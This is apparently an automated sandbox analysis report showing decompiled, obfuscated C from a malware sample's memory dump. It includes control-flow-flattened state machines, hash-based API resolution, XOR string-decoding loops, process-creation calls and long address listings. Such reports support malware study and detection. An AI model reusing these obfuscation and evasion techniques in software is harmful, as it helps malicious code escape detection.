					_t50 = _t71;
					if(_t71 != 0x2de3212c) {
						continue;
					}
					asm("movaps xmm6, [esp+0x70]");
					return _t50;
					goto L32;
				}
				if(_t71 > 0x11a1a451) {
					if(_t71 == 0x11a1a452) {
						E012DCDB9(0x68, _t112);
						_t119 = _t112;
						E012DCDB9(8, _t112);
						 *(_t122 + 0x68) = _t112;
						 *_t119 = 0x68;
						 *(_t119 + 0x3c) = 1;
						 *((short*)(_t119 + 0x40)) = 0;
						r8d = 0x2bf91925;
						r9d = 0x3c;
						E012DFAD7(1, _t102, _t112, _t114);
						 *((long long*)(_t122 + 0x48)) =  *(_t122 + 0x68);
						 *(_t122 + 0x40) = _t119;
						asm("movups [esp+0x30], xmm6");
						 *((intOrPtr*)(_t122 + 0x28)) = 0x8000000;
						 *((intOrPtr*)(_t122 + 0x20)) = 0;
						_t116 = _t129;
						r8d = 0;
						r9d = 0; // executed
						CreateProcessA(??, ??, ??, ??, ??, ??, ??, ??, ??, ??); // executed
						_t50 =  ==  ? 0x21139ce2 : 0xfa4d7a7c;
						goto L1;
					} else {
						_t50 = _t71;
						if(_t71 != 0x21139ce2) {
							goto L1;
						} else {
							goto L25;
						}
					}
				} else {
					if(_t71 == 0x9f3e05ed) {
						_t114 = _t118;
						_t116 = _t128;
						E012E0CE8(0, _t96, _t101, _t102, _t103, _t112, _t114, _t128, _t123);
						L25:
						_t50 = 0x2de3212c;
					} else {
						_t50 = _t71;
						if(_t71 == 0xfa4d7a7c) {
							_t113 =  *(_t122 + 0x68);
							r8d = 0x2db58ff7;
							r9d = 0x11;
							E012DFAD7(1, _t102, _t113, _t114);
							 *_t113();
							_t112 =  *(_t122 + 0x68);
							_t96 = 1;
							r8d = 0x2db58ff7;
							r9d = 0x11;
							E012DFAD7(1, _t102, _t112,  *((intOrPtr*)(_t113 + 8)));
							_t114 =  *_t112;
							 *_t112();
							_t50 = 0x21139ce2;
						}
					}
					goto L1;
				}
				goto L32;
			}




















                                                                                                                                                        0x012d8282
                                                                                                                                                        0x012d8282
                                                                                                                                                        0x012d8282
                                                                                                                                                        0x012d8295
                                                                                                                                                        0x012d829a
                                                                                                                                                        0x012d829d
                                                                                                                                                        0x012d82a0
                                                                                                                                                        0x012d82a6
                                                                                                                                                        0x012d82b0
                                                                                                                                                        0x012d82b5
                                                                                                                                                        0x012d82c4
                                                                                                                                                        0x012d82c7
                                                                                                                                                        0x012d82ce
                                                                                                                                                        0x012d82d1
                                                                                                                                                        0x012d82d1
                                                                                                                                                        0x012d82d1
                                                                                                                                                        0x012d82d8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d82e0
                                                                                                                                                        0x012d8388
                                                                                                                                                        0x012d8472
                                                                                                                                                        0x012d8476
                                                                                                                                                        0x012d847e
                                                                                                                                                        0x012d8486
                                                                                                                                                        0x012d8492
                                                                                                                                                        0x012d849b
                                                                                                                                                        0x012d849b
                                                                                                                                                        0x012d84a3
                                                                                                                                                        0x012d84b1
                                                                                                                                                        0x012d84b5
                                                                                                                                                        0x012d84b8
                                                                                                                                                        0x012d84bb
                                                                                                                                                        0x012d849b
                                                                                                                                                        0x012d84c1
                                                                                                                                                        0x012d84c6
                                                                                                                                                        0x012d84e9
                                                                                                                                                        0x012d838e
                                                                                                                                                        0x012d838e
                                                                                                                                                        0x012d8396
                                                                                                                                                        0x012d839c
                                                                                                                                                        0x012d83a0
                                                                                                                                                        0x012d83a8
                                                                                                                                                        0x012d83b4
                                                                                                                                                        0x012d83bc
                                                                                                                                                        0x012d83bc
                                                                                                                                                        0x012d83c4
                                                                                                                                                        0x012d83d8
                                                                                                                                                        0x012d83df
                                                                                                                                                        0x012d83e6
                                                                                                                                                        0x012d8453
                                                                                                                                                        0x012d8453
                                                                                                                                                        0x012d8453
                                                                                                                                                        0x012d8396
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d8388
                                                                                                                                                        0x012d82e6
                                                                                                                                                        0x012d82ee
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d82f6
                                                                                                                                                        0x012d8404
                                                                                                                                                        0x012d8408
                                                                                                                                                        0x012d8410
                                                                                                                                                        0x012d8418
                                                                                                                                                        0x012d8420
                                                                                                                                                        0x012d842c
                                                                                                                                                        0x012d8430
                                                                                                                                                        0x012d8430
                                                                                                                                                        0x012d8438
                                                                                                                                                        0x012d8446
                                                                                                                                                        0x012d844a
                                                                                                                                                        0x012d844d
                                                                                                                                                        0x012d8430
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d842c
                                                                                                                                                        0x012d82fc
                                                                                                                                                        0x012d8304
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d857f
                                                                                                                                                        0x012d8597
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d8597
                                                                                                                                                        0x012d8311
                                                                                                                                                        0x012d83ee
                                                                                                                                                        0x012d84f6
                                                                                                                                                        0x012d84fb
                                                                                                                                                        0x012d8503
                                                                                                                                                        0x012d8508
                                                                                                                                                        0x012d850d
                                                                                                                                                        0x012d8514
                                                                                                                                                        0x012d851b
                                                                                                                                                        0x012d852d
                                                                                                                                                        0x012d8533
                                                                                                                                                        0x012d8539
                                                                                                                                                        0x012d853e
                                                                                                                                                        0x012d8543
                                                                                                                                                        0x012d8548
                                                                                                                                                        0x012d854d
                                                                                                                                                        0x012d8555
                                                                                                                                                        0x012d855f
                                                                                                                                                        0x012d8562
                                                                                                                                                        0x012d8565
                                                                                                                                                        0x012d8568
                                                                                                                                                        0x012d8577
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d83f4
                                                                                                                                                        0x012d83f4
                                                                                                                                                        0x012d83fc
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d8402
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d8402
                                                                                                                                                        0x012d83fc
                                                                                                                                                        0x012d8317
                                                                                                                                                        0x012d831d
                                                                                                                                                        0x012d845d
                                                                                                                                                        0x012d8460
                                                                                                                                                        0x012d8463
                                                                                                                                                        0x012d8468
                                                                                                                                                        0x012d8468
                                                                                                                                                        0x012d8323
                                                                                                                                                        0x012d8323
                                                                                                                                                        0x012d832b
                                                                                                                                                        0x012d832d
                                                                                                                                                        0x012d833d
                                                                                                                                                        0x012d8343
                                                                                                                                                        0x012d8349
                                                                                                                                                        0x012d8351
                                                                                                                                                        0x012d8353
                                                                                                                                                        0x012d835d
                                                                                                                                                        0x012d8362
                                                                                                                                                        0x012d8368
                                                                                                                                                        0x012d836e
                                                                                                                                                        0x012d8373
                                                                                                                                                        0x012d8376
                                                                                                                                                        0x012d8378
                                                                                                                                                        0x012d8378
                                                                                                                                                        0x012d832b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d831d
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 012D3998: FindCloseChangeNotification.KERNELBASE ref: 012D3A06
                                                                                                                                                        • CreateProcessA.KERNELBASE ref: 012D8568
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ChangeCloseCreateFindNotificationProcess
                                                                                                                                                        • String ID: ,!-$,!-$)}$)}$)}
                                                                                                                                                        • API String ID: 3988087930-3082868487
                                                                                                                                                        • Opcode ID: 9201e7a053d5d05c994b5693df976931112c07eb7d85478749a20647e1e8586b
                                                                                                                                                        • Instruction ID: 61a9a415df3f383da368f4d712dc1f291e92d35f1aa33ef7d1a0b6b5e6db3490
                                                                                                                                                        • Opcode Fuzzy Hash: 9201e7a053d5d05c994b5693df976931112c07eb7d85478749a20647e1e8586b
                                                                                                                                                        • Instruction Fuzzy Hash: B66157727286C04AEB188B5DE86532FBB50E7D5394F14412EEF8A8BF44DE78C445CB01
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 012D4554, Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 505processCOMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 66%
                                                                                                                                                        			E012D4554(long long __rax, void* __rcx, void* __r11) {
				long long _v72;
				signed long long _v80;
				signed long long _v88;
				signed long long _v96;
				void* _v104;
				intOrPtr _v108;
				signed long long _v120;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				void* _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				char _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				void* _v176;
				void* _v184;
				long long _v192;
				void* _v200;
				void* _v208;
				signed int _v212;
				intOrPtr _v216;
				long long _v224;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				void* _v248;
				intOrPtr _v252;
				void* _v264;
				signed int _v268;
				void* _t155;
				void* _t167;
				void* _t179;
				intOrPtr _t207;
				void* _t215;
				intOrPtr _t277;
				void* _t278;
				long long _t302;
				signed long long _t307;
				signed long long _t315;
				void* _t327;
				signed long long _t341;
				void* _t342;
				signed long long _t346;
				void* _t350;
				void* _t351;
				signed long long _t353;
				signed long long _t354;

				_t302 = __rax;
				_t350 =  &_v248;
				_t342 = __rcx;
				E012DCDB9(0x64, __rax);
				_v264 = _t302;
				r14d = 0;
				r8d = 0x64;
				E012DC8BC(0, _t302, _v264, _t351, __r11);
				_v104 = _t342 + 0xadc;
				_t341 = _v104;
				r8d = 0x328b7e5;
				r9d = 0x57;
				E012DFAD7(1, _t278, _t302, _v264);
				_t327 = _t341;
				r8d = 0x64;
				 *_t302();
				_v72 = _t302;
				r13d = 4;
				_t346 =  &_v248 | _t353;
				_v80 =  &_v144 | _t353;
				_v88 =  &_v176 | _t353;
				_t307 =  &_v160;
				_t354 = _t353 | _t307;
				_t155 = 0xbd3af00e;
				L1:
				while(1) {
					L1:
					while(1) {
						while(_t155 > 0x156d8657) {
							if(_t155 <= 0x47698b65) {
								if(_t155 <= 0x26d898f6) {
									if(_t155 == 0x156d8658) {
										_t167 = 0x3661a3a2;
										L88:
										_t155 =  ==  ? 0xc2dc12f5 : _t167;
										continue;
									}
									if(_t155 == 0x17687833) {
										L61:
										_t307 = _v200;
										_t155 = 0xaac379a3;
										continue;
									}
									if(_t155 != 0x256502ce) {
										continue;
									}
									_v248 = r14b;
									_v244 = 0x69babbe9;
									_v240 = 0x3790a6e1;
									_v236 = 0x1992b0c1;
									if(_v248 != r14b) {
										L41:
										_t327 = _v224;
										r8d = 0xb;
										E012DCA65(_t327, _t346, _t351);
										_t155 =  ==  ? 0x57f7ec6f : 0x79c90ec8;
										r12d = _v108;
										continue;
									}
									do {
										 *(_t350 + 0x40 + _t307 * 4) =  *(_t350 + 0x40 + _t307 * 4) & 0xe608375b |  !( *(_t350 + 0x40 + _t307 * 4)) & 0x19f7c8a4;
										_t327 = _t327 + 1;
										_t307 = _t307 + 1;
									} while (_t307 != 4);
									goto L41;
								}
								if(_t155 > 0x3661a3a1) {
									if(_t155 == 0x3661a3a2) {
										_t167 = 0x7953da70;
										goto L88;
									}
									if(_t155 == 0x4459eabe) {
										r14d = _t207;
										r8d = 0x2db58ff7;
										r9d = 0x11;
										E012DFAD7(1, _t278, _t307, _t327);
										FindCloseChangeNotification(??); // executed
										E012DCC2E(_t307, _v96);
										 *_v264 = 0x56;
										 *((char*)(_v264 + 1)) = _t341 + 0x41;
										_t307 = _v264;
										 *((char*)(_t307 + 2)) = 0;
										r8d = 0x7328b7e5;
										r9d = 0x59;
										E012DFAD7(1, _t278, _t307, _v264);
										_t327 = _v104;
										_t207 = r14d;
										r14d = 0;
										 *_t307();
										_t155 = 0x47698b66;
										_v216 = _t277;
									}
									continue;
								}
								if(_t155 == 0x26d898f7) {
									_v176 = r14b;
									_v172 = 0x1883419a;
									_v168 = 0x45ab62af;
									_v164 = 0x6b874fbe;
									if(_v176 != r14b) {
										L71:
										_t327 = _v224;
										r8d = 0xb;
										E012DCA65(_t327, _v88, _t351);
										_t155 =  ==  ? 0xf699f5c5 : 0x82cc269e;
										continue;
									}
									do {
										 *(_t350 + 0x88 + _t307 * 4) = ( *(_t350 + 0x88 + _t307 * 4) & 0xb7e568a1 |  !( *(_t350 + 0x88 + _t307 * 4)) & 0x481a975e) ^ 0x23f8a085;
										_t327 = _t327 + 1;
										_t307 = _t307 + 1;
									} while (_t307 != 4);
									goto L71;
								} else {
									if(_t155 == 0x2d4edb4e) {
										_t155 =  ==  ? 0xc2dc12f5 : 0xedb8c621;
										_v212 = 0;
									}
									continue;
								}
							}
							if(_t155 <= 0x6b450fde) {
								if(_t155 <= 0x4a7d68ff) {
									if(_t155 == 0x498446a6) {
										r8d = 0x86fb7f30;
										r9d = 0x60;
										E012DFAD7(1, _t278, _t307, _t327);
										_t327 = _v120;
										 *_t307(); // executed
										_t155 =  ==  ? 0x4459eabe : 0x90bf802d;
										_t207 = _v252;
										_t277 = _v252;
										continue;
									}
									if(_t155 != 0x47698b66) {
										continue;
									}
									return _v216;
								} else {
									if(_t155 == 0x4a7d6900) {
										_t155 =  ==  ? 0xc3b70504 : 0x47698b66;
										_v216 = r15d;
									} else {
										if(_t155 == 0x57f7ec6f) {
											_t155 = 0x79c90ec8;
											r12d = 0x10;
										}
									}
									continue;
								}
							}
							if(_t155 > 0x7953da6f) {
								if(_t155 == 0x7953da70) {
									_t167 = 0x2d4edb4e;
									goto L88;
								}
								if(_t155 == 0x79c90ec8) {
									_v252 = r12d;
									_t155 =  ==  ? 0x498446a6 : 0x4459eabe;
									_t277 = _v252;
								}
								continue;
							}
							if(_t155 == 0x6b450fdf) {
								_t307 = _v264;
								_t179 = 0x4a7d6900;
								_t215 = 0x42fedaa;
								L63:
								_t155 =  ==  ? _t215 : _t179;
								r15d = 0;
								continue;
							}
							if(_t155 != 0x74143c86) {
								continue;
							}
							_v248 = r14b;
							_v244 = 0x76969af2;
							_v240 = 0x52bdad8b;
							_v236 = 0x37c5c8a5;
							if(_v248 != r14b) {
								L10:
								_t327 = _v224;
								r8d = 8;
								E012DCA65(_t327, _t346, _t351);
								_t155 =  ==  ? 0x84ce7a97 : 0x256502ce;
								continue;
							} else {
								do {
									 *(_t350 + 0x40 + _t307 * 4) =  *(_t350 + 0x40 + _t307 * 4) & 0xc83a375a |  !( *(_t350 + 0x40 + _t307 * 4)) & 0x37c5c8a5;
									_t327 = _t327 + 1;
									_t307 = _t307 + 1;
								} while (_t307 != 4);
								goto L10;
							}
						}
						if(_t155 > 0xbd3af00d) {
							if(_t155 <= 0xd01fc255) {
								if(_t155 == 0xbd3af00e) {
									_t155 =  ==  ? 0x8161912a : 0x9e0aa110;
								} else {
									if(_t155 == 0xc2dc12f5) {
										_t155 = 0xedb8c621;
										_v212 = _v268;
									} else {
										if(_t155 == 0xc3b70504) {
											E012DCDB9(0x130, _t307);
											_v96 = _t307;
											_v208 = _v96;
											_t307 = _v208;
											 *_t307 = 0x130;
											_t277 = 1;
											r8d = 0x29f7579a;
											r9d = 0x61;
											E012DFAD7(1, _t278, _t307, _t327);
											 *_t307(); // executed
											_v120 = _t307;
											r8d = 0xfd3d1fba;
											r9d = 0x5f;
											E012DFAD7(1, _t278, _t307, _t327);
											_t327 = _v120;
											 *_t307(); // executed
											_t155 =  ==  ? 0x4459eabe : 0x90bf802d;
											_t207 = 1;
										}
									}
								}
								continue;
							}
							if(_t155 > 0xf699f5c4) {
								if(_t155 == 0xf699f5c5) {
									goto L61;
								}
								if(_t155 != 0x42fedaa) {
									continue;
								}
								_t307 = _v264;
								_v268 =  *(_t307 + 1) + 0x000000bf & 0x000000ff;
								_t167 = 0x156d8658;
								goto L88;
							}
							if(_t155 == 0xd01fc256) {
								_v248 = r14b;
								_v244 = 0x47e317b0;
								_v240 = 0x45c33cb0;
								_v236 = 0x54c811fd;
								_v232 = 0x31b074d3;
								if(_v248 != r14b) {
									L75:
									_t327 = _v224;
									r8d = 0xc;
									E012DCA65(_t327, _t346, _t351);
									_t155 =  ==  ? 0xa0db398f : 0x74143c86;
									continue;
								}
								do {
									 *(_t350 + 0x44 + _t307 * 4) = ( *(_t350 + 0x44 + _t307 * 4) & 0xb5f129fc |  !( *(_t350 + 0x44 + _t307 * 4)) & 0x4a0ed603) ^ 0x7bbea2d0;
									_t307 = _t307 + 1;
								} while (_t307 != 4);
								goto L75;
							} else {
								if(_t155 == 0xedb8c621) {
									_t155 = 0x4a7d6900;
									r15d = _v212;
								}
								continue;
							}
						}
						if(_t155 <= 0x90bf802c) {
							if(_t155 == 0x8161912a) {
								r15d = 0;
								r8d = 0xce1f1c4e;
								r9d = 0xc5;
								E012DFAD7(1, _t278, _t307, _t327);
								 *_t307();
								_t155 = 0x4a7d6900;
								continue;
							}
							if(_t155 == 0x82cc269e) {
								_v144 = r14b;
								_v140 = 0x23a07c9f;
								_v136 = 0x33b759aa;
								_v132 = 0x35b96ff0;
								_v128 = 0x50c10ade;
								if(_v144 != r14b) {
									L81:
									_t327 = _v224;
									r8d = 0xc;
									E012DCA65(_t327, _v80, _t351);
									_t307 = _v200;
									_t155 =  ==  ? 0xaac379a3 : 0xd01fc256;
									continue;
								}
								do {
									 *(_t350 + 0xac + _t307 * 4) = ( *(_t350 + 0xac + _t307 * 4) & 0x5681c0fd |  !( *(_t350 + 0xac + _t307 * 4)) & 0xa97e3f02) ^ 0xf9bf35dc;
									_t307 = _t307 + 1;
								} while (_t307 != 4);
								goto L81;
							}
							if(_t155 == 0x84ce7a97) {
								_t155 = 0x79c90ec8;
								r12d = 8;
							}
							continue;
						}
						if(_t155 > 0xa0db398e) {
							if(_t155 == 0xa0db398f) {
								_t155 = 0x79c90ec8;
								r12d = 4;
							} else {
								if(_t155 == 0xaac379a3) {
									_t155 = 0x79c90ec8;
									r12d = 2;
								}
							}
							continue;
						}
						if(_t155 == 0x90bf802d) {
							_v108 = _t207;
							_v200 =  &_v160;
							_t315 = _v200;
							_v160 = r14b;
							_v156 = 0x333f36d7;
							_v152 = 0x383b6ee2;
							_v148 = 0x405e40f3;
							if(_v160 != r14b) {
								L67:
								_v224 = _v208 + 0x2c;
								_t327 = _v224;
								r8d = 9;
								E012DCA65(_t327, _t354, _t351);
								_v192 =  &_v176;
								_v184 =  &_v144;
								_t307 = _v184;
								_t155 =  ==  ? 0x17687833 : 0x26d898f7;
								continue;
							}
							do {
								 *(_t350 + 0x98 + _t315 * 4) = ( *(_t350 + 0x98 + _t315 * 4) & 0x1233963d |  !( *(_t350 + 0x98 + _t315 * 4)) & 0xedcc69c2) ^ 0xad922954;
								_t327 = _t327 + 1;
								_t315 = _t315 + 1;
							} while (_t315 != 4);
							goto L67;
						}
						if(_t155 != 0x9e0aa110) {
							continue;
						} else {
							_t307 = _v264;
							_t179 = 0x4a7d6900;
							_t215 = 0x6b450fdf;
							goto L63;
						}
					}
				}
			}
























































                                                                                                                                                        0x012d4554
                                                                                                                                                        0x012d4560
                                                                                                                                                        0x012d4567
                                                                                                                                                        0x012d456f
                                                                                                                                                        0x012d4574
                                                                                                                                                        0x012d457e
                                                                                                                                                        0x012d4581
                                                                                                                                                        0x012d4589
                                                                                                                                                        0x012d4595
                                                                                                                                                        0x012d45a2
                                                                                                                                                        0x012d45b1
                                                                                                                                                        0x012d45b7
                                                                                                                                                        0x012d45bd
                                                                                                                                                        0x012d45c2
                                                                                                                                                        0x012d45c8
                                                                                                                                                        0x012d45ce
                                                                                                                                                        0x012d45d0
                                                                                                                                                        0x012d45d8
                                                                                                                                                        0x012d45e3
                                                                                                                                                        0x012d45f1
                                                                                                                                                        0x012d4604
                                                                                                                                                        0x012d460c
                                                                                                                                                        0x012d4614
                                                                                                                                                        0x012d4617
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d461c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d461c
                                                                                                                                                        0x012d461c
                                                                                                                                                        0x012d462c
                                                                                                                                                        0x012d4726
                                                                                                                                                        0x012d4812
                                                                                                                                                        0x012d4df0
                                                                                                                                                        0x012d4e4e
                                                                                                                                                        0x012d4e53
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d4e53
                                                                                                                                                        0x012d481d
                                                                                                                                                        0x012d4ac5
                                                                                                                                                        0x012d4ad2
                                                                                                                                                        0x012d4ad7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d4ad7
                                                                                                                                                        0x012d4828
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d482e
                                                                                                                                                        0x012d4833
                                                                                                                                                        0x012d483b
                                                                                                                                                        0x012d4843
                                                                                                                                                        0x012d4850
                                                                                                                                                        0x012d487f
                                                                                                                                                        0x012d487f
                                                                                                                                                        0x012d4884
                                                                                                                                                        0x012d488d
                                                                                                                                                        0x012d489e
                                                                                                                                                        0x012d48a1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d48a1
                                                                                                                                                        0x012d4859
                                                                                                                                                        0x012d486f
                                                                                                                                                        0x012d4873
                                                                                                                                                        0x012d4876
                                                                                                                                                        0x012d4879
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d4859
                                                                                                                                                        0x012d4731
                                                                                                                                                        0x012d49d1
                                                                                                                                                        0x012d4e49
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d4e49
                                                                                                                                                        0x012d49dc
                                                                                                                                                        0x012d49e2
                                                                                                                                                        0x012d49f4
                                                                                                                                                        0x012d49fa
                                                                                                                                                        0x012d4a00
                                                                                                                                                        0x012d4a08
                                                                                                                                                        0x012d4a12
                                                                                                                                                        0x012d4a1c
                                                                                                                                                        0x012d4a27
                                                                                                                                                        0x012d4a2a
                                                                                                                                                        0x012d4a2f
                                                                                                                                                        0x012d4a47
                                                                                                                                                        0x012d4a4d
                                                                                                                                                        0x012d4a53
                                                                                                                                                        0x012d4a58
                                                                                                                                                        0x012d4a5e
                                                                                                                                                        0x012d4a61
                                                                                                                                                        0x012d4a64
                                                                                                                                                        0x012d4a66
                                                                                                                                                        0x012d4a6d
                                                                                                                                                        0x012d4a6d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d49dc
                                                                                                                                                        0x012d473c
                                                                                                                                                        0x012d4be2
                                                                                                                                                        0x012d4bea
                                                                                                                                                        0x012d4bf5
                                                                                                                                                        0x012d4c00
                                                                                                                                                        0x012d4c13
                                                                                                                                                        0x012d4c4e
                                                                                                                                                        0x012d4c4e
                                                                                                                                                        0x012d4c53
                                                                                                                                                        0x012d4c61
                                                                                                                                                        0x012d4c72
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d4c72
                                                                                                                                                        0x012d4c1c
                                                                                                                                                        0x012d4c3b
                                                                                                                                                        0x012d4c42
                                                                                                                                                        0x012d4c45
                                                                                                                                                        0x012d4c48
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d4742
                                                                                                                                                        0x012d4747
                                                                                                                                                        0x012d475e
                                                                                                                                                        0x012d4761
                                                                                                                                                        0x012d4761
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d4747
                                                                                                                                                        0x012d473c
                                                                                                                                                        0x012d4637
                                                                                                                                                        0x012d47b0
                                                                                                                                                        0x012d4aaf
                                                                                                                                                        0x012d4e6f
                                                                                                                                                        0x012d4e75
                                                                                                                                                        0x012d4e7b
                                                                                                                                                        0x012d4e80
                                                                                                                                                        0x012d4e86
                                                                                                                                                        0x012d4e95
                                                                                                                                                        0x012d4e98
                                                                                                                                                        0x012d4e9c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d4e9c
                                                                                                                                                        0x012d4aba
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d4ebc
                                                                                                                                                        0x012d47b6
                                                                                                                                                        0x012d47bb
                                                                                                                                                        0x012d4d05
                                                                                                                                                        0x012d4d0b
                                                                                                                                                        0x012d47c1
                                                                                                                                                        0x012d47c6
                                                                                                                                                        0x012d47cc
                                                                                                                                                        0x012d47d1
                                                                                                                                                        0x012d47d1
                                                                                                                                                        0x012d47c6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d47bb
                                                                                                                                                        0x012d47b0
                                                                                                                                                        0x012d4642
                                                                                                                                                        0x012d4973
                                                                                                                                                        0x012d4e2b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d4e2b
                                                                                                                                                        0x012d497e
                                                                                                                                                        0x012d4984
                                                                                                                                                        0x012d499a
                                                                                                                                                        0x012d499d
                                                                                                                                                        0x012d499d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d497e
                                                                                                                                                        0x012d464d
                                                                                                                                                        0x012d4ae1
                                                                                                                                                        0x012d4ae9
                                                                                                                                                        0x012d4aee
                                                                                                                                                        0x012d4af3
                                                                                                                                                        0x012d4af3
                                                                                                                                                        0x012d4af6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d4af6
                                                                                                                                                        0x012d4658
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d465a
                                                                                                                                                        0x012d465f
                                                                                                                                                        0x012d4667
                                                                                                                                                        0x012d466f
                                                                                                                                                        0x012d467c
                                                                                                                                                        0x012d46ab
                                                                                                                                                        0x012d46ab
                                                                                                                                                        0x012d46b0
                                                                                                                                                        0x012d46b9
                                                                                                                                                        0x012d46ca
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d467e
                                                                                                                                                        0x012d4685
                                                                                                                                                        0x012d469b
                                                                                                                                                        0x012d469f
                                                                                                                                                        0x012d46a2
                                                                                                                                                        0x012d46a5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d4685
                                                                                                                                                        0x012d467c
                                                                                                                                                        0x012d46d7
                                                                                                                                                        0x012d4773
                                                                                                                                                        0x012d48b3
                                                                                                                                                        0x012d4e0a
                                                                                                                                                        0x012d48b9
                                                                                                                                                        0x012d48be
                                                                                                                                                        0x012d4e12
                                                                                                                                                        0x012d4e1b
                                                                                                                                                        0x012d48c4
                                                                                                                                                        0x012d48c9
                                                                                                                                                        0x012d48d4
                                                                                                                                                        0x012d48d9
                                                                                                                                                        0x012d48e9
                                                                                                                                                        0x012d48ee
                                                                                                                                                        0x012d48f3
                                                                                                                                                        0x012d48f9
                                                                                                                                                        0x012d4905
                                                                                                                                                        0x012d490b
                                                                                                                                                        0x012d4911
                                                                                                                                                        0x012d491d
                                                                                                                                                        0x012d491f
                                                                                                                                                        0x012d493b
                                                                                                                                                        0x012d4941
                                                                                                                                                        0x012d4947
                                                                                                                                                        0x012d494c
                                                                                                                                                        0x012d4952
                                                                                                                                                        0x012d4961
                                                                                                                                                        0x012d4964
                                                                                                                                                        0x012d4964
                                                                                                                                                        0x012d48c9
                                                                                                                                                        0x012d48be
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d48b3
                                                                                                                                                        0x012d477e
                                                                                                                                                        0x012d4a7b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d4a82
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d4a88
                                                                                                                                                        0x012d4a95
                                                                                                                                                        0x012d4aa0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d4aa0
                                                                                                                                                        0x012d4789
                                                                                                                                                        0x012d4c7a
                                                                                                                                                        0x012d4c7f
                                                                                                                                                        0x012d4c87
                                                                                                                                                        0x012d4c8f
                                                                                                                                                        0x012d4c97
                                                                                                                                                        0x012d4ca4
                                                                                                                                                        0x012d4cd1
                                                                                                                                                        0x012d4cd1
                                                                                                                                                        0x012d4cd6
                                                                                                                                                        0x012d4cdf
                                                                                                                                                        0x012d4cf0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d4cf0
                                                                                                                                                        0x012d4ca8
                                                                                                                                                        0x012d4cc4
                                                                                                                                                        0x012d4cc8
                                                                                                                                                        0x012d4ccb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d478f
                                                                                                                                                        0x012d4794
                                                                                                                                                        0x012d479a
                                                                                                                                                        0x012d47a3
                                                                                                                                                        0x012d47a3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d4794
                                                                                                                                                        0x012d4789
                                                                                                                                                        0x012d46e2
                                                                                                                                                        0x012d47e1
                                                                                                                                                        0x012d4d15
                                                                                                                                                        0x012d4d1f
                                                                                                                                                        0x012d4d25
                                                                                                                                                        0x012d4d2b
                                                                                                                                                        0x012d4d30
                                                                                                                                                        0x012d4d32
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d4d32
                                                                                                                                                        0x012d47ec
                                                                                                                                                        0x012d4d3c
                                                                                                                                                        0x012d4d44
                                                                                                                                                        0x012d4d4f
                                                                                                                                                        0x012d4d5a
                                                                                                                                                        0x012d4d65
                                                                                                                                                        0x012d4d78
                                                                                                                                                        0x012d4dab
                                                                                                                                                        0x012d4dab
                                                                                                                                                        0x012d4db0
                                                                                                                                                        0x012d4dbe
                                                                                                                                                        0x012d4dd2
                                                                                                                                                        0x012d4de1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d4de1
                                                                                                                                                        0x012d4d7c
                                                                                                                                                        0x012d4d9b
                                                                                                                                                        0x012d4da2
